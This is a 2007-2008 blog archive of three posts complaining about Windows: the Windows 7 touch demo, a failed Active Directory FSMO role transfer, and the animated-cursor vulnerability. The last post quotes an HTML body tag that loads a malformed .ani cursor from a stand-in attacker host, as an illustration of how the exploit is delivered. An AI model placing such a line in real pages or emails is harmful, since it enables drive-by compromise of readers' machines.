Posts Tagged ‘windows’

Stupid Windows Tricks

Monday, June 2nd, 2008

Take a few minutes and watch this video of a demonstration of Windows 7 multi-touch technology. At first glance you may be thinking, that’s some spiffy new technology. I’m going to run down a whole list of reasons why this is going to flop.

Screen dirt

I can’t speak for everyone on this concern, but it is a big one for me. I can’t stand a dirty monitor. If there are fingerprints, smudges or smears which get in the way of my work, it simply pisses me off. At the resolution I run displays, even a tiny drop of pop spit up by carbonation of a nearby drink is noticeable. Now you want me to smear my fingers all over the screen on purpose? No thanks.

Tired arms

With your monitor in the traditional position of straight ahead of you and up at eye level, arm fatigue is going to set in very, very quickly. Don’t believe me? Try it now. Pretend you’re working with this interface on your monitor for a few minutes and see if your arms don’t start to tire. This means you either have to suffer through the arm fatigue and take more breaks from your work, or move the monitor into a non-tradition position of flat on the desk in front of you. Now try working in collaboration with someone else on a problem with the screen flat down on the desk.

Fat fingers produce little detail

Pointing with a mouse or trackball is as precise as the cursor. Pointing with our fingers works to a certain extent, but how often do we pick up a pen or other smaller diameter object to point with, even for a large screen presentation? Trying to run CAD or photo manipulation software with your fingers is going to simply suck. How about just spreadsheet work? Do you want to be pushing around on a spreadsheet, trying to narrow it down to the correct cell?

Blocked vision

Speaking of tired arms and fingers, what about the fact that your hand is in the way? Does anyone want to be editing a photo or laying out a spreadsheet with your hands blocking the view of your work? Try to imagine touching up a photo, where you’re trying to clone another portion or work at blending a scratch or other damage, where your hand is blocking your view.

Screen longevity

Touch interfaces take their toll on screens. I have a HP PocketPC, which after three years is already scratched and slightly worn in spots (such as the close button, which is always in the same place) in spite of my rather careful attitude toward keeping the screen intact. How many users are going to want to buy a new monitor every two to three years, because you’ve scratched up the one you’ve been using with your fingernails, or the touch membrane is wearing out and becoming less responsive? How many women with long nails are going to want to cut them short because their monitor at work uses capacitive connectivity rather than pressure?

Touch screens have their place, and they’ve been around a long, long time now (1971) – but never caught on for mainstream applications. Why? Because it is a senseless waste of effort for most tasks. Leave it to Microsoft to try to redo an otherwise limited vertical market of Point of Sale systems, pocket devices and industrial interfaces to a general PC interface. They just couldn’t take the clue that the reason this hasn’t taken off in the mainstream over the last 37 years is that there simply isn’t a need for it.

A whole lot of “gee-wiz” and not a damned bit of common sense in this one.

Tags: , , ,
Posted in Asides, Computers | No Comments »

Iterative Insanity the Microsoft Way

Friday, March 7th, 2008

A friend of mine likes to say that the definition of insanity is doing the same thing over and over, and expecting a different result each time.

By that definition, Microsoft is the quintessential model for insanity.

I made the mistake of taking on Windows systems administration a few years ago where I work, as I thought the challenge of learning the intricacies of a previously unfamiliar OS would give me a more rounded experience with systems administration in general and allow me to learn to appreciate why Windows admins seemed to love the environment they worked with. Coming from a solid Unix background, I figured that I would find similarities in function and implementation, to the point that course work would not be needed to learn the ropes. I was correct in that aspect and learned quickly via a couple of incidents where I was able to resolve issues that long time Windows admins could not, that having my previous systems administration experience was a boon in general and very much a keystone to ability that only required study of freely available documentation to attain.

What I was also to learn, however, was that many of the paradigms I was used to would have to be ignored and the replacements that Microsoft had implemented, just plain suck. Consistency of methodology is damn near non-existent. Graphical User Interface (GUI) tools got in the way more times than they helped and their interfaces were inconsistent from each other. To get at the real functionality of the GUI tools, half the time you have to right-click on unexpected places to pull up hidden options. Even the simple structure of system settings are inconsistent and stupidly designed.

A perfect example of the nonsense I ran into can be found in the local security settings of any Windows box. You can find sensible settings, such as, “Domain member: Require strong (Windows 2000 or later) session key” with the options of “Enabled” or “Disabled”.  Just below it, however, are “Interactive logon: Do not display last user name” and “Interactive logon: Do not require CTRL+ALT+DEL” with the same options, “Enabled” or “Disabled”. This double negative verbiage is simply ridiculous.

Or how about the fact that even though you’ve setup your Active Directory (AD) domain when you promoted the first Windows server to be a Domain Controller, with clients logging in on your domain and the forest setup with trusts to other domains, et cetera, the name of the Domain Name System (DNS) domain is still “default_domain_name” (or something like that, memory serving,) until you open up the Microsoft Management Console (MMC), run the Active Directory Sites and Services plugin and right click on the entry to chose “Rename” from the popup menu. This is in spite of the fact that you have to enter the DNS name as part of the AD promotion process. I discovered this when I refused to base our entire network’s DNS service to Microsoft’s implementation and had to copy all the SRV records in the netlogon.dns file to the Unix DNS server. After digging around for an hour or so, I finally found out what was up. Of course, if I had enabled DNS and auto-updates of DNS on the AD controller, the information would have been setup correctly then. Most Windows administrators would have simply setup DNS on the AD controller and been done with it. I’ve even read articles advising doing so, no matter what you’ve been using for DNS before, just in case something breaks later with a change suddenly instigated through an update from Microsoft!

Like I said, inconsistency reigns.

The task set before me this week was a new one. The primary Active Directory controller is old and needs to retire. New hardware was ready to go and was tested, so it was time to replace the old with the new. Yes, Microsoft claims that there is no such thing as a Primary Domain Controller (PDC) anymore, but it is only a half truth – as you still have Flexible Single Master Operations (FSMO) server roles, limiting edits of various services to specific systems. You can (limitedly) spread them out among multiple machines, but that doesn’t change the fact that the FSMO roles exist on specific systems and do not have an order of precedence to roll over to another server, should the FSMO server go down. So, even if you spread out your five FSMO roles among different machines, now you have multiple points of failure instead of one. Net gain: nothing.

In my case, our AD domain is tiny. We support about 30 Windows machines anymore, so we had two AD controllers, with the first one setup as the FSMO role server for all five rolls. (This happens automatically the first time an AD controller is setup in an AD forest.) The process to transfer the FSMO roles can be done in one of two ways: right-clicking on a bunch of clumsy GUI menus through three different MMC plugins or running the ntdsutil on the command line and suffering through what is the most abysmal modal command line interface I’ve ever seen.

ntdsutil sucks – it really, really sucks, but it was better than flopping around in three different MMC plugins. So, I started the process of transferring all five FSMO roles from the old server to the new with the command line tool. The PDC Emulator and RID Master roles transferred without a hitch. But try as I might, the Schema Master, Domain Naming Master and Infrastructure Master roles would not transfer, giving a generic error that multiple searches on Google could not elucidate.

So, I decided to make the new server seize the roles which would not transfer. This worked – to an extent. All five roles were reported by the new server to be handled by the new server, but the two old domain controllers now believed that the old FSMO server was still serving all five roles. How the two which had previously transferred correctly were now on the old machine again, was yet another mystery. At this point I didn’t want conflict, so I tried to transfer the roles back from the new machine to the old, all of which failed without even an error message to tell me something was amiss. I now had two AD controllers in the same AD domain of the same AD forest, who both thought that they were the FSMO role master for all five roles.

I left it this way over the weekend, just to see if things would work out or whether additional error messages might tell me something of what was going on. No change came. No new information was revealed.

I tried demoting the new server to stop acting as an AD controller, but it would not allow me to demote the system, giving yet another seemingly random numbered error message. That was enough for me. In desperation, I did what many Windows administrators do at times like these: start over from scratch and do that exact damn thing all over again. I powered the new machine off, re-installed Windows 2003 Enterprise Server, put on anti-virus software and updated with all patches, promoted it to an AD domain controller and kicked up ntdsutil on the old machine and transferred the FSMO roles in the same order I had during the first attempt. Everything worked perfectly. A quick check with the netdom command showed that all three machines now understood that the new server handled all FSMO roles and the whole process was done in just a few seconds time. I had done everything the second time around as I had the first, each step was in the exact order as I had written down. Nothing different was done and everything suddenly worked.

A friend of mine likes to say that the definition of insanity is doing the same thing over and over, and expecting a different result each time.

I understand now that this is why so many people cannot understand that computers are not supposed to crash or otherwise fail in stupid and unpredictable ways. They keep doing things the Microsoft way and insanity prevails and becomes the norm. They can’t understand that things should work the same way every time and that system up time can be measured in years instead of days on a stable operating system. I’m half convinced that Microsoft went to their once a month “Patch Tuesday” methodology for updates, just to make sure that all Windows machines would have to be rebooted once a month, in order to keep the systems appearing stable. I have also come to realize that many people have been fooled into believing that a boondoggled GUI is “more advanced” or otherwise “better” than editing simple text files for system settings – that somehow editing a text file is primitive in comparison – overlooking the fact that cumbersome GUI’s are often simply doing that very task.

If my varied and insane experiences over the last eight years with Windows has taught me anything, it is that whenever possible, no matter how difficult the transition may be at first – if you can run the service on Unix instead, do so. If you leave it up to Windows, you leave it up to sporadic behavior, inane tools and retarded, clumsy and often secretive GUI interfaces. You seemingly leave it up to pure chance.

To me, that is insane.

Tags: , , , , ,
Posted in Computers | No Comments »

Cursors? WTF?

Friday, March 30th, 2007

Just when I thought Microsoft couldn’t sink any lower into stupidity, an exploit comes out which works by over-running Window’s animated cursor routine.

You read that right, animated cursors. You know, the little pointer that moves by your mouse.

As it turns out, this is so easy to exploit through Outlook and Internet Explorer, that a Web page or HTML email containing something as simple as:

<BODY style=”CURSOR: url(‘http://www.weownyou.com/cursor.ani’)”>

with “cursor.ani” being the malformed animated cursor, is enough to allow their code to completely take over your Windows box, whether it is Windows 98 or Vista. There is no way to turn off the hooks in either program to not load animated cursors, so you’re stuck until Microsoft releases a patch.

I can excuse mistakes in code, as none of us are perfect. When an operating system becomes as large as Windows is, it is nigh impossible to find every bug the first pass through. However, to have a design problem so large that your animated cursor routine allows exploitation of the entire operating system, is beyond belief. How do you fuck up mouse handling routines so badly, that it allows an OS exploit?

What the hell is next? Remote exploits through the file renaming routine?

Tags: , ,
Posted in Computers | No Comments »